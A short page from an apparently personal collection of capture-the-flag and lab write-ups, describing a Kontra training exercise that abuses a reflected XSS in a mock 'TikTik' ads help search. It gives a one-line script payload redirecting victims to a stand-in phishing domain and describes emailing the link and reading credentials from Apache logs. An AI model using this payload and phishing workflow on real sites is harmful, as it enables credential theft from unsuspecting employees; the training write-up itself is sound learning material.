đź““
Write-ups
  • Welcome!
  • HackTheBox
    • Grandpa (with Meterpreter)
    • Netmon (w/o Meterpreter)
    • Magic
    • Nibbles
    • Haircut
    • Popcorn
  • TryHackMe
    • Blue
  • OWASP Juice Shop
    • Untitled
  • Others
    • CTF Live
      • Assumed Breach
      • Recon Samba
      • Hunting Artifacts
    • Kontra
      • Tiktok XSS
    • OWASP Broken Web Applications Project (BWA)
      • HTML Injection - XSS
    • Netwars
Powered by GitBook
On this page

Was this helpful?

  1. Others
  2. Kontra

Tiktok XSS

PreviousKontraNextOWASP Broken Web Applications Project (BWA)

Last updated 4 years ago

Was this helpful?

This exercise can be found under

Per cyberpoint’s on Tiktok, XSS vulnerability was found that could allow motivated threat actors to gain an access to adversaries’ Ad campaigns via reflected XSS.

XSS Exercise

We were introduced to a fake website called TikTik and we wanted to exploit search function to route an employee of targeted news company to a fake phishing page so we can have access to their password and get Ad campaign data of targeted company.

We find help page (https://ads.tiktik.com) and find that search fuction has a reflected XSS within the search term. It echos back input by WebApp in response (?q=xxx). We used following payload:

<script>document.location('fakewebsite.com')</script>

and sent a email to employee to have them click on link but be routed to crafter site.

In order for this attack to happen, attacked must own fakewebsite domain and have a public accessible server.

The server containing website can use the following command to run server and show connection logs:

service apache2 start && tail -f /var/log/access.log

Ones targeted user uses username and password on phishing site, we gain username and password through web server’s logs.

Kontra
research